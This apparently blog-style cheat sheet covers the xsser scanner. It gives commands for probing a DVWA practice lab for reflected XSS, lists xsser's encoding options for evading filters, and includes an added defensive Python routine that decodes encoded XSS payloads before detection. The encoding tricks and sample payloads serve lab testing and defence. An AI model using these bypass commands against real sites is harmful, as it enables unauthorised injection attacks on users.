xsser

Author: FateKey | Published 2018-02-07 11:54

    Common commands

    xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --reverse-check
    Check whether XSS is present
    xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --heuristic

    Bypass commands

    --Str Use method String.FromCharCode()
    --Une Use Unescape() function
    --Mix Mix String.FromCharCode() and Unescape()
    --Dec Use Decimal encoding
    --Hex Use Hexadecimal encoding
    --Hes Use Hexadecimal encoding, with semicolons
    --Dwo Encode vectors IP addresses in DWORD
    --Doo Encode vectors IP addresses in Octal
    --Cem=CEM Try -manually- different Character Encoding Mutations
    (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
    xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=high; PHPSESSID=d23e469411707ff8210717e67c521a81" --Cem='Mix,Une,Str,Hex'
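
Seen from the defending side, the encodings listed above are the reason input inspection has to run on a canonical form of the parameter rather than on the raw bytes. The following is an added example (not from the original post or from xsser): a Python routine that undoes percent, %u, numeric-entity and String.fromCharCode() layers, repeatedly, before matching. The function names, marker list and sample values are assumptions constructed here; the exact strings xsser emits for each option are not shown on the page, and the DWORD/octal IP options are not covered.

```python
import html
import re
from urllib.parse import unquote

# String.fromCharCode(60,115,...) calls (case-insensitive).
_FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.I)
# Legacy %uXXXX escapes that JavaScript's unescape() understands.
_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")
# Illustrative markers only (an assumption), not a complete XSS filter.
_MARKERS = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)


def _char_codes(match):
    """Turn a fromCharCode() argument list into text; keep it if malformed."""
    try:
        return "".join(chr(int(c)) for c in match.group(1).split(",") if c.strip())
    except (ValueError, OverflowError):
        return match.group(0)


def canonicalize(value, max_rounds=5):
    """Decode repeatedly until stable, so mixed or nested layers are undone."""
    for _ in range(max_rounds):
        decoded = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded)        # %3C -> <
        decoded = html.unescape(decoded)  # &#60 and &#x3c; -> < (semicolon optional)
        decoded = _FROM_CHAR_CODE.sub(_char_codes, decoded)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(value):
    """Match on the canonical form, never on the raw parameter."""
    return bool(_MARKERS.search(canonicalize(value)))


# Constructed sample parameter values (not captured traffic).
SAMPLES = {
    "plain": "hello world",
    "dec_entity": "&#60&#115&#99&#114&#105&#112&#116&#62",
    "hex_entity": "&#x3c;script&#x3e;",
    "char_code": "String.fromCharCode(60,115,99,114,105,112,116,62)",
    "double_pct": "%253Cscript%253E",
}
if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:12} {is_suspicious(raw)!s:5} {canonicalize(raw)!r}")
```

The bounded loop matters for the `Mix` case and for double encoding: a single decoding pass leaves `%253C` as `%3C`, which a raw-string match would miss.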

    Injection commands

    Other commands

    --gtk Launch the graphical interface
